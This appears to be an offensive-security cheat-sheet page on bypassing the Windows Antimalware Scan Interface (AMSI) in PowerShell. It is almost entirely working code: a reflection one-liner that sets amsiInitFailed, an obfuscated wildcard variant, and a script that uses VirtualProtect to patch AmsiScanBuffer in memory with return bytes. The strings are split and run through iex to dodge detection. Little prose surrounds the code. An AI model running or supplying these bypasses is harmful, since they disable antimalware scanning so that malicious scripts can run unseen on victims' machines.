Setting amsiInitFailed to $null
The System.Management.Automation namespace is the root namespace for the Windows PowerShell. This technique is therefore PowerShell specific and only affect the Anti Malware Scan-Interface for PowerShell script-code.
Copy $a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$b = $a.GetField('amsiInitFailed','NonPublic,Static')
$b.SetValue($null,$true)
Copy (([Ref].Assembly.GetTypes() | Where-Object {$_.Name -like '*iUtils'}).GetFields('NonPublic,Static') | Where-Object {$_.Name -like '*Failed'}).SetValue($null, $true) amsi.dll is loaded into a new process to hook any input in the PowerShell command line or to analyse content for [System.Reflection.Assembly]::Load() calls.
Copy function getProcAddress {
Param (
[OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $true)]
[String]
$moduleName,
[Parameter( Position = 1, Mandatory = $true)]
[String]
$functionName
)
# Get reference to System.dll in the GAC
$sysassembly = [System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {
$_.GlobalAssemblyCache -and $_.Location.Split('\\')[-1] -eq 'System.dll'
}
$types = $sysassembly.GetTypes()
$unsafenativemethods = ForEach ($type in $types) {
$type | Where-Object {$_.FullName -like '*NativeMethods' -and $_.Fullname -like '*Win32*' -and $_.Fullname -like '*Un*'}
}
# Get reference to GetModuleHandle and GetProcAddress methods
$modulehandle = $unsafenativemethods.GetMethods() | Where-Object {$_.Name -like '*Handle' -and $_.Name -like '*Module*'}
$procaddress = $unsafenativemethods.GetMethods() | Where-Object {$_.Name -like '*Address' -and $_.Name -like '*Proc*'} | Select-Object -First 1
# Get handle on module specified
$module = $modulehandle.Invoke($null, @($moduleName))
$procaddress.Invoke($null, @($module, $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$ansi = "a"+"msi."+"dll"
$sb = "Amsi" + "Scan" + "Buffer"
$sbAddr = getProcAddress $ansi $sb
$vpAddr = getProcAddress 'kernel32.dll' 'VirtualProtect'
$vpDelegate = getDelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) Boolean
$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vpAddr, $vpDelegate)
$p = 0
$VirtualProtect.Invoke($sbAddr, [uint32]5, 0x40, [ref]$p)
$pb = [Byte[]] (184, 87, 0, 7, 128, 195)
$system = "[System"
$ri = "Runtime.InteropServices"
$marshal = "Marshal]"
$copy = "::Copy"
iex ($system + "." + $ri + "." + $marshal + $copy + "(`$pb, 0, `$sbAddr, 6)")